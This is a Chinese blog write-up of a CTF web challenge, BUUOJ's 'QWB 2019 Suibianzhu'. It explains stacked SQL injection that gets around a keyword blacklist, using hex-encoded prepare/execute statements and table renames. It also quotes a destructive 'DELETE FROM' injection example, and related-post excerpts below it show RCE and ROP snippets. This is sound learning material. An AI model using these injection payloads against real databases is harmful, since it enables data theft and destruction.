buuoj强网杯2019随便注

最新推荐文章于 2022-07-31 16:42:24 发布
最新推荐文章于 2022-07-31 16:42:24 发布
阅读量1.5k 收藏 6
点赞数 3
分类专栏: web 文章标签: web buuoj
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43619533/article/details/103433643
版权

buuoj强网杯2019随便注

打开环境:
在这里插入图片描述
查看源码:
在这里插入图片描述
说明sqlmap行不通。
返回页面
依次输入:

1
1'
1'   #
1’  order by  2  #

发现可以正常显示,注入题,并且爆出了字段数。
输入select

return preg_match("/select|update|delete|drop|insert|where|\./i",$inject);

过滤掉了这些关键词。

使用堆叠注入试试;

在SQL中,分号(;)是用来表示一条sql语句的结束。试想一下我们在 ; 结束一个sql语句后继续构造下一条语句,会不会一起执行?因此这个想法也就造就了堆叠注入。而union injection(联合注入)也是将两条语句合并在一起,两者之间有什么区别么?区别就在于union 或者union all执行的语句类型是有限的,可以用来执行查询语句,而堆叠注入可以执行的是任意的语句。例如以下这个例子。用户输入:1; DELETE FROM products服务器端生成的sql语句为:(因未对输入的参数进行过滤)Select * from products where productid=1;DELETE FROM products当执行查询后,第一条显示查询信息,第二条则将整个表进行删除。

1';show databases;  #
1';show tables; #

发现堆叠注入出现了数据库名和表名

array(1) {
  [0]=>
  string(16) "1919810931114514"
}

array(1) {
  [0]=>
  string(5) "words"
}

目的为查询出表1919810931114514中的信息

1';show columns from `1919810931114514`;#

在这里插入图片描述
可知flag字段的值即为目的

解法1:
因为select被过滤了,所以先将select * from 1919810931114514进行16进制编码

再通过构造payload,得1’;SeT@a=0x73656c656374202a2066726f6d20603139313938313039333131313435313460;prepare execsql from @a;execute execsql;#

进而得到flag

SELECT可以在一条语句里对多个变量同时赋值,而SET只能一次对一个变量赋值,如下:
复制代码 代码如下:
SELECT @VAR1=‘Y’,@VAR2=‘N’
– 而SET要达到同样的效果,需要:
SET @VAR1=‘Y’
SET @VAR2=‘N’

prepare…from…是预处理语句,会进行编码转换。
execute用来执行由SQLPrepare创建的SQL语句

解法2:
1’;rename tables words to words1;rename tables 1919810931114514 to words; alter table words change flag id varchar(100);#

这段代码的意思是将words表名改为words1,1919810931114514表名改为words,将现在的words表中的flag列名改为id
然后用1’ or 1=1 #得到flag
在这里插入图片描述

房東的猫
关注
  • 3
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Buuctf Http
Dexret的博客
12-07 2261
打开该靶机,发现该靶机为一个普通的页面 查看一下该网页的源码 发现有一个Secret.php的网页,打开该网页 这里提示我们需要从https://Sycsecret.buuoj.cn去访问该网页 利用Burpsuite对该网页进行抓包,添加referer值 Referer:https://Sycsecret.buuoj.cn 添加完referer值后发现,又需要我们通过Syclover浏览器去访问该网页 修改User-Agent值 User-Agent:Syclover ..
BUUOJ-[GXYCTF2019]-WEB-WP
会下雪的晴天
09-13 931
平台地址:https://buuoj.cn/ 目录Ping Ping PingBabySQli禁止套娃 Ping Ping Ping 知识点:RCE,空格及过滤的一些基本绕过 提示GET ip,应该是RCE了,ls看看有啥 尝试cat一下,发现过滤了空格,绕过一下,过滤了flag,哈哈看来不是这么简单啊,读一下源码吧 空格绕过可以用这些字符:< 、<>、%20(space)、%09(tab)、$IFS$9、 ${IFS}、$IFS、$IFS$1 等 试了试好像只有$I.
CTF-Web-[极客大挑战 2019]Http
归子莫的博客
05-03 6592
CTF-Web-[极客大挑战 2019]Http 博客说明 文章所涉及的资料来自互联网整理和个人总结,意在于个人学习和经验汇总,如有什么地方侵权,请联系本人删除,谢谢!本文仅用于学习与交流,不得用于非法用途! CTP平台 网址 https://buuoj.cn/challenges 题目 Web类,[极客大挑战 2019]Http 打开题目的实例 思路 看到http类的题目,打开burp,...
【靶场练习】BUUCTF——[RoarCTF 2019]Easy Java
weixin_49422491的博客
07-31 1842
[RoarCTF 2019]Easy Java
[BUUCTF-pwn]——铁人三项(第五赛区)_2018_rop
Y_peak的博客
02-11 412
[BUUCTF-pwn]——铁人三项(第五赛区)_2018_rop 题目地址: https://buuoj.cn/challenges#铁人三项(第五赛区)_2018_rop 思路:没有sytem函数,所以应该需要自己去找. 从旁边的函数列表发现了write函数,可以利用将 read 函数的 got所储存的内容泄露出来,泄露出read函数的实际地址 。利用循环调用,再次调用read函数, 然后利用偏移找到system函数和 '/bin/sh'字符串的位置。最后组成payload exploit
buuoj re逆向49-64题writeup(截图+c++源码+过程).doc
12-31
文章上传不了,用word的形式上传,buuoj re 逆向49-64题writeup(截图+c++源码+过程)
buuoj re逆向1-64题writeup(截图+c++源码+过程).rar
12-31
buuoj re逆向1-64题writeup(截图+c++源码+过程) 与前面发的一模一样,只不过打包了,喜欢的可以支持一下
java外贸网站源码-buuoj:浮标
06-05
java外贸网站源码 LPOJ 一个基于Vue.js和Django的轻量级在线评测系统 目前应用于广东外语外贸大学 演示地址: 说明文档: 简述 轻量级,易于部署和自定义定制 前后端分离,提高服务器性能 支持多机器多进程判题,判...
buuojweb刷题wp详解及知识整理—-【护网杯】easy_tornado(模板注入+md5)
01-20
写在前面 服务端模板注入也是一种注入攻击(简称为SSTL) 这又涉及到了本人的知识盲区 借这个题学习补充一下知识 自己走过的路加wp辅助 信息收集加思路推理 ...回显 render 而且url处有异常 同理测试其他选项 ...
GreatEscape
10-24
GreatEscape
buuoj Pwn writeup 86-90
yongbaoii的博客
03-08 222
86 axb_2019_brop64 保护 花里胡哨的。 平平无奇栈溢出。 from pwn import * context.log_level="debug" r = remote('node3.buuoj.cn',29649) elf = ELF('./86') libc = ELF("./64/libc-2.23.so") main=0x4007d6 puts_plt=elf.plt['puts'] puts_got=elf.got['puts'] pop_rdi=0x400963 r.r
BUUCTF [极客大挑战 2019]Knife
stars的博客
10-28 163
文章目录题目解法扩展 题目 https://buuoj.cn/challenges#[%E6%9E%81%E5%AE%A2%E5%A4%A7%E6%8C%91%E6%88%98%202019]Knife 解法 根据打开的页面提示,选择使用蚁剑尝试连接 地址:http://087fdd98-b888-4596-93d9-aec98575e831.node3.buuoj.cn/ 密码:Syc 连接成功,查找之后发现flag在根目录 flag即在flag文件中 扩展 真就是题如标题一样,白给的flag ..
buu 简单册器
YenKoc的博客
04-02 1532
一.本身对安卓逆向这块不是很熟悉,为了看这题稍微了解了一下,原来安卓虚拟机解释运行的是dex文件,和java的字节码不一样,然后是smail语法,这块我不会,所以找个了个神器来反编译2333,然后这题目没有骗人确实简单,一个Tab键,反编译出源码,将加密算法,单独拿出来执行,得到flag ...
[BUUCTF011][ACTF2020 新生赛]Exec 1
m0_52674595的博客
12-03 253
[BUUCTF011] [ACTF2020 新生赛]Exec 1 ping地址 第一反应当然是Ping127.0.0.1 但是什么都没有得到 尝试能不能查找到可能包含flag 的flag文件 127.0.0.1;cat /flag 结果 直接 得到了flag 阿这 有点不可思议啊!!! 去网上看了看大家的wp 发现可以 一级一级的去寻找flag文件。 我们先来查看一下这里面的所有文件, 127.0.0.1|ls ../../../ 然后得到 然后再去cat flag即可 ...
CTF buuoj pwn-----第3题:warmup_csaw_2016
bing_Max的博客
08-29 1654
CTF buuoj pwn-----第3题:warmup_csaw_2016前言一、pandas是什么?二、使用步骤1.引入库2.读入数据总结前言一、pandas是什么?二、使用步骤1.引入库2.读入数据总结创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 前言 提示:这里可以添加本文要记录的大概内容: 例如:随着人工智能的不断发展,机器学习这门技
CTF题之BUUCTF系列:BUUCTF Misc N种方法解决
一只小蜜蜂的博客
07-31 4684
一、名称 BUUCTF Misc N种方法解决 二、题目链接:https://buuoj.cn/challenges 解压缩后是一个exe执行文件 双击执行后,弹出以下提示: 无法打开,未获得结果,换其它解决方法。 三、解题步骤 1、使用winhex工具打开KEY.exe文件,查看一下内部结构 2、发现文档后面有两个等号(==),前面有着data:image/jpg;base64。猜测可能是一个经过base64编码的图片,于是将那一串字符串作为网址,粘贴到浏览器中,打..
Buuoj刷题记录
meteox的博客
08-09 4019
--- title: Buuoj刷题记录 date: 2020-07-20 11:07:42 tags: 题解 categories: ctf img: https://img.buuoj.cn/buugirl/img/1.png 记录buuoj写过的题 web [HCTF 2018]WarmUp F12看到存在source.php,跳转后看到代码 <?php highlight_file(__FILE__); class emmm { publ
[强网杯 2019]随便
Is_Linmouren的博客
09-25 151
[强网杯 2019]随便 知识点 堆叠注入 尝试了一下单引号闭合;存在堆叠注入;过滤了 return preg_match("/select|update|delete|drop|insert|where|\./i",$inject);右键看源码有一个释 <!-- sqlmap是没有灵魂的 --> 于是试了下sqlmap,可以跑出数据库跑不出表; 动手:payload:`1’;show database;show tables; array(2) { [0]=> stri
BUUCTF reverse:[GXYCTF2019]luck_guy,findit,简单册器题解
weixin_50549897的博客
02-01 818
[GXYCTF2019]luck_guy题解 由于作者水平有限,有不当之处或有更好方法请在评论区指出 题目地址https://buuoj.cn/challenges 拖进IDA,查看main函数 找到patch_me(0),里面可以看到,如果输入的是偶数就进入get_flag()函数。本题关键应该就在里面。打开后 unsigned __int64 get_flag() { unsigned int v0; // eax int i; // [rsp+4h] [rbp-3Ch] int j; //
wireshark buuoj
最新发布
10-19
Wireshark是一款网络协议分析工具,可以帮助用户捕获和分析网络数据包。它可以用于网络故障排除、网络安全分析、网络通信协议开发等方面。而buuoj是一个CTF平台,提供了各种各样的CTF题目,包括网络安全、二进制安全、密码学等等。在CTF比赛中,Wireshark可以帮助选手分析网络流量,找到有用的信息,解决一些网络安全问题。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值